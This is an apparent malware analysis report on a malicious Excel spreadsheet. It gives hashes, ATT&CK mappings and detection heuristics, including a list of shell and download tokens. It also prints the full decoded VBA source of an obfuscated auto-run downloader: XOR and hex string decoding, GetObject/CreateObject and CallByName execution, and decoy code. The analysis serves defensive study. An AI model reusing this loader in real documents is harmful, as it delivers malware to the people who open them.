Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 be345834660619db…

MALICIOUS

Office (OLE) / .XLS

Size: 211.5 KB
Created: 2023-05-29 21:19:51
Authoring application: Microsoft Excel
First seen: 2023-06-01
MD5: 6e33ac6fffeeafffd24664edb2c5762e
SHA-1: d9f49edc406dbe56fe9dbc039081ae98b08090df
SHA-256: be345834660619db92373d1d00ad025ad0d3891fd33bf49a7cf51d5ca47d5c1a
Risk score: 210

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is an Excel spreadsheet containing VBA macros, including a Workbook_Open auto-execution macro. High-severity heuristics flag the use of CreateObject, GetObject, and CallByName, together with an auto-exec entry point paired with execution tokens in the compiled p-code, indicating that the macro is designed to run code. The macro's obfuscated nature and the presence of a lure to enable macros point towards a malicious downloader. Because the strings are decoded at runtime from worksheet cells, the exact payload or C2 cannot be determined statically, but the overall pattern is consistent with macro-based malware delivery.

Heuristics (8)

  • VBA macros detected (medium; 5 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • CreateObject call (high) [OLE_VBA_CREATEOBJ]
    Matched line in script:
    Set Tracked = GetObject(Hosts).CreateObject(SeniorS)
  • GetObject call (high) [OLE_VBA_GETOBJ]
    Matched line in script:
    Set Tracked = GetObject(Hosts).CreateObject(SeniorS)
  • CallByName call (high) [OLE_VBA_CALLBYNAME]
    Matched line in script:
    CallByName Tracked, Dialogue, VbMethod, EngagEmEnt, 0
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (low) [OLE_VBA_WBOPEN]
    Matched line in script:
    Sub Workbook_Open()
  • Macro/content-enable lure (medium) [SE_ENABLE_LURE]
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found in document text (OLE body):
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://ns.adobe.com/photoshop/1.0/
    • http://purl.org/dc/elements/1.1/

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4826 bytes
SHA-256: 7c486c408742231b1cc860bbac34c2c89d4d5d54163a9235ba1ed9e9be7b21c9

Preview script (first 1,000 lines of the extracted script; obfuscation padding of blank lines and random indentation removed, statements unchanged):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Hosts As String
Private SeniorS As String
Private Dialogue As String

' String decoder: hex-decodes Lookup via Destruction, then XORs each byte with
' one character of the static key "qf5457bf92" (key index = byte index Mod 10).
' Branches holds the key as a UTF-16 byte array, hence the "Recall * 2" index.
' Control flow is scrambled with GoTo; the InputBox blocks are unreachable decoys.
Private Function IsraelI(ByVal Lookup As String) As Variant
    Dim Equation As Long: Equation = 0: Dim Billing() As Byte: Dim Branches() As Byte, Crossing As String, Recall As Integer
    Branches = "qf5457bf92"
    GoTo Customized
Psychological:
    ' Unreachable decoy
    Dim SpecialiStS As String
    SpecialiStS = InputBox("temper cool")
Bunch:
    If Equation < UBound(Billing) Then
        Recall = Equation Mod (10)
        GoTo Litigation
InteractIons:
        Crossing = Crossing & Chr(Billing(Equation))
        Equation = Equation + 1
        GoTo Bunch
    Else
        GoTo Nurses
    End If
Charlie:
    ' Unreachable decoy
    Dim Bargains As String
    Bargains = InputBox("setem ponutn")
Nurses:
    IsraelI = Crossing
    Exit Function
Customized:
    Billing = Destruction(Lookup)
    GoTo Bunch
Litigation:
    Billing(Equation) = Abs(Billing(Equation) Xor Branches(Recall * 2))
    GoTo InteractIons
End Function

' Loader body: reads four encoded strings from cells on sheet "b73fa",
' decodes them, instantiates a COM object via GetObject(...).CreateObject(...)
' and hands it to MeMphis for the late-bound method call.
Private Sub SymbolS()
    Dim Tracked As Object
    Dim EngagEmEnt As String
    GoTo InteractIons
SubmiSSionS:
    Dialogue = IsraelI(Dialogue)
    MeMphis Tracked, EngagEmEnt
    Exit Sub
Understood:
    Hosts = IsraelI(Hosts)
    EngagEmEnt = IsraelI(EngagEmEnt)
    SeniorS = IsraelI(SeniorS)
    Set Tracked = GetObject(Hosts).CreateObject(SeniorS)
    GoTo SubmiSSionS
    ' Unreachable decoy (skipped by the GoTo above)
    Dim Crossing As String
    Crossing = InputBox("pass")
    MsgBox Crossing
    Hosts = Crossing
InteractIons:
    Hosts = Sheets("b73fa").Range("J110").Value: EngagEmEnt = Sheets("b73fa").Range("J189").Value: SeniorS = Sheets("b73fa").Range("G163").Value: Dialogue = Sheets("b73fa").Range("G170").Value
    GoTo Understood
End Sub

' Invokes the decoded method name (Dialogue) on the COM object with the
' decoded argument (EngagEmEnt) through late-bound CallByName.
Sub MeMphis(ByVal Tracked As Object, ByVal EngagEmEnt As String)
    CallByName Tracked, Dialogue, VbMethod, EngagEmEnt, 0
End Sub

' Auto-exec entry point: jumps straight to Margin; Bargains is still an empty
' string there, so SymbolS always runs. The InputBox/MsgBox lines are decoys.
Sub Workbook_Open()
    GoTo Margin
    Dim Bargains As String
    Bargains = InputBox("Put err code")
    Dim SpecialiStS As String
    SpecialiStS = InputBox("Optimisrt")
    MsgBox SpecialiStS
Margin:
    If Bargains = "" Then
        SymbolS
    End If
End Sub

' Hex decoder: for each two-character pair of Charlie, builds the literal
' "&Hxx" (Chr(38) = "&", Chr(72) = "H") and lets VBA coerce it into a Byte.
Private Function Destruction(ByVal Charlie As String) As Variant
    Dim Crossing() As Byte, i As Long, Recall As Integer, Margin As Integer
    Margin = Len(Charlie) / 2: i = 0: ReDim Crossing(0 To Margin) As Byte
Bargains:
    If i < Len(Charlie) Then
        Recall = Recall + 1
        Crossing(Recall - 1) = Chr(14 + (12 * 2)) & Chr((16 + (4 * 5)) * 2) & Mid(Charlie, i + 1, 2)
        i = i + 2
        GoTo Bargains
    Else
        GoTo SpecialiStS
        ' Unreachable decoy
        Dim Litigation As String
        Litigation = InputBox("Autoscale calculation")
    End If
SpecialiStS:
    Destruction = Crossing
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True